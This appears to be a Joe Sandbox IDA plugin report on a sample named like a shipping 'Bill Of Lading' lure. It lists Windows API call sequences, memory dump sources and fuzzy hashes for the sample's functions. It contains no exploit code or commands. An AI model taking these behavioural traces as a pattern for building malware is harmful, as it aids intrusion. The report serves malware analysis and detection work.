                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 535477410-0
                                                                                                                      • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                      • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                      • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                      • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • _memset.LIBCMT ref: 004538C4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                      • _wcslen.LIBCMT ref: 00453960
                                                                                                                      • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3530711334-4108050209
                                                                                                                      • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                      • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                      • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                      • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 3488606520-2761332787
                                                                                                                      • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                      • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                      • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                      • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• Ellipse.GDI32(?,?,?,00000000), ref: 00447463
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
• AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
• LineTo.GDI32(?,?), ref: 004474BF
• CloseFigure.GDI32(?), ref: 004474C6
• SetPixel.GDI32(?,?,?,?), ref: 004474D6
• Rectangle.GDI32(?,?), ref: 004474F3
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• Ellipse.GDI32(?,?,?,00000000), ref: 00447463
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
• AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
• LineTo.GDI32(?,?), ref: 004474BF
• CloseFigure.GDI32(?), ref: 004474C6
• SetPixel.GDI32(?,?,?,?), ref: 004474D6
• Rectangle.GDI32(?,?), ref: 004474F3
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: AngleCloseEllipseFigureLineMovePixelRectangle
• String ID:
• API String ID: 288456094-0
APIs
• GetParent.USER32(?), ref: 004449B0
• GetKeyboardState.USER32(?), ref: 004449C3
• SetKeyboardState.USER32(?), ref: 00444A0F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(?), ref: 00444BA9
• GetKeyboardState.USER32(?), ref: 00444BBC
• SetKeyboardState.USER32(?), ref: 00444C08
• PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
• PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00457C34
                                                                                                                      • _memset.LIBCMT ref: 00457CE8
                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                      • String ID: <$@
                                                                                                                      • API String ID: 1325244542-1426351568
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                      • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcscat.LIBCMT ref: 004737F6
                                                                                                                      • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547909840-0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                      • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2354583917-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                      • GetMenu.USER32 ref: 004776AA
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                      • _wcslen.LIBCMT ref: 0047771A
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1823500076-0
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                      • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                      • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                      • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 896007046-0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                      • SendMessageW.USER32(030D1A80,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                      • SendMessageW.USER32(030D1A80,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 312131281-0
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004484C4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                      • IsMenu.USER32(?), ref: 0044857B
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                      • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      APIs
                                                                                                                      • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                      • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                      • String ID: 0vH
                                                                                                                      • API String ID: 327565842-3662162768
                                                                                                                      • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                      • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                      • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                      • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                      • GetFocus.USER32 ref: 00448B1C
                                                                                                                      • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                      • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                      • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429747543-0
                                                                                                                      • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                      • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                      • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                      • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                      • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu$HH
                                                                                                                      • API String ID: 3164766367-3924996404
                                                                                                                      • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                      • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                      • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                      • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 3850602802-3636473452
                                                                                                                      • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                      • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                      • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                      • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                                      APIs
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3985565216-0
                                                                                                                      • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                      • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                                                      • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                      • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                                      • __calloc_crt.LIBCMT ref: 00415743
                                                                                                                      • __getptd.LIBCMT ref: 00415750
                                                                                                                      • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                                      • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
